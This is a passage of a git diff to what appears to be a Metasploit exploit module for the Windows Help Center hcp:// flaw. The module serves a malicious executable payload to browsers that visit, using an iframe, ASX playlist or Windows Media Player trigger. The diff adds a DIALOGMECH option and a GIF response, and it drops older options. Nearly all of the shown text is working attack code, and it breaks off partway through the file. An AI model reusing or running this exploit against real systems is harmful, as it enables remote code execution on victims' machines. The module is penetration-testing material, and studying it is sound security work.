diff --git a/modules/exploits/windows/browser/ms10_xxx_helpctr_xss_cmd_exec.rb b/modules/exploits/windows/browser/ms10_xxx_helpctr_xss_cmd_exec.rb index 9e724908ce..5c5c0f2d7c 100644 --- a/modules/exploits/windows/browser/ms10_xxx_helpctr_xss_cmd_exec.rb +++ b/modules/exploits/windows/browser/ms10_xxx_helpctr_xss_cmd_exec.rb @@ -19,7 +19,6 @@ class Metasploit3 < Msf::Exploit::Remote # include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::EXE - include Msf::Exploit::CmdStagerVBS def initialize(info = {}) super(update_info(info, @@ -30,13 +29,15 @@ class Metasploit3 < Msf::Exploit::Remote directly via URLs by installing a protocol handler for the scheme "hcp". Due to an error in validation of input to hcp:// combined with a local cross site scripting vulnerability and a specialized mechanism to launch the XSS trigger, - arbitrary command execution can be achieved. + arbitrary command execution can be achieved. - On IE6 and IE7 on XP SP2 or SP3, code execution is automatic. On IE8, a dialog - box pops, but if WMP9 is installed, WMP9 can be used for automatic execution. - If IE8 and WMP11, a dialog box will ask the user if execution should continue. - Automatic detection of these options is implemented in this module, and will - default to not sending the exploit for IE8/WMP11 unless the option is overridden. + On IE7 on XP SP2 or SP3, code execution is automatic. If WMP9 is installed, it + can be used to launch the exploit automatically. If IE8 and WMP11, either can + be used to launch the attack, but both pop dialog boxes asking the user if + execution should continue. This exploit detects if non-intrusive mechanisms are + available and will use one if possible. In the case of both IE8 and WMP11, the + exploit defaults to using an iframe on IE8, but is configurable by setting the + DIALOGMECH option to "none" or "player". }, 'Author' => [ @@ -63,20 +64,16 @@ class Metasploit3 < Msf::Exploit::Remote 'Platform' => 'win', 'Targets' => [ - [ 'Automatic', { } ], # Only automatic for now. - #[ 'IE6/IE7', { 'trigger_method' => 'iframe' } ], # Only tested IE7 / XP SP2,3 - #[ 'IE8/WMP9', { 'trigger_method' => 'asx' } ], # untested - #[ 'IE8/WMP11', { 'trigger_method' => 'asx' } ], # tested, pops dialog box + [ 'Automatic', { } ] ], 'DisclosureDate' => 'June 09, 2010', 'DefaultTarget' => 0)) register_options( [ - #OptString.new( 'CMD', [ true, "The URI-encoded command to execute.", "calc.exe" ]), - OptBool.new( 'RUNWITHDIALOG', [ true, "Proceed with exploit even if it will pop a dialog to the user?", false]), OptPort.new( 'SRVPORT', [ true, "The daemon port to listen on", 80 ]), - OptString.new( 'URIPATH', [ true, "The URI to use.", "/" ]) + OptString.new( 'URIPATH', [ true, "The URI to use.", "/" ]), + OptString.new( 'DIALOGMECH', [ true, "IE8/WMP11 trigger mechanism (none, iframe, or player).", "iframe"]) ], self.class) deregister_options('SSL', 'SSLVersion') # Just for now @@ -112,16 +109,12 @@ class Metasploit3 < Msf::Exploit::Remote def process_get(cli, request) - #print_status("Responding to GET request from #{cli.peerhost}:#{cli.peerport}") - @my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST'] - webdav_loc = "\\\\#{@my_host}\\#{@random_dir}\\#{@payload}" - @url_base = "http://" + @my_host if (Regexp.new(Regexp.escape(@payload)+'$', true).match(request.uri)) - print_status "GET for payload received." + print_status "Sending payload executable to target ..." return if ((p = regenerate_payload(cli)) == nil) data = Msf::Util::EXE.to_win32pe(framework, p.encoded) @@ -130,20 +123,27 @@ class Metasploit3 < Msf::Exploit::Remote return end + if request.uri.match(/\.gif$/) + # "world's smallest gif" + data = "GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00!\xF9\x04\x01" + data += "\x00\x00\x00\x00,\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02D\x01\x00;" + print_status "Sending gif image to WMP at #{cli.peerhost}:#{cli.peerport} ..." + send_response(cli, data, { 'Content-TYpe' => 'image/gif' } ) + end # ASX Request Inbound if request.uri.match(/\.asx$/) asx = %Q| - + | -# asx.gsub!(/URLBASE/, @url_base) asx.gsub!(/STARTHELP/, @random_dir + "/" + @start_help) - print_status("ASX file requested. Responding to #{cli.peerhost}:#{cli.peerport}...") + asx.gsub!(/IMGFILE/, @random_dir + "/" + @img_file) + print_status("Sending asx file to #{cli.peerhost}:#{cli.peerport} ...") send_response(cli, asx, { 'Content-Type' => 'text/html' }) return end @@ -152,12 +152,8 @@ class Metasploit3 < Msf::Exploit::Remote if request.uri.match(/#{@start_help}/) help_html = %Q|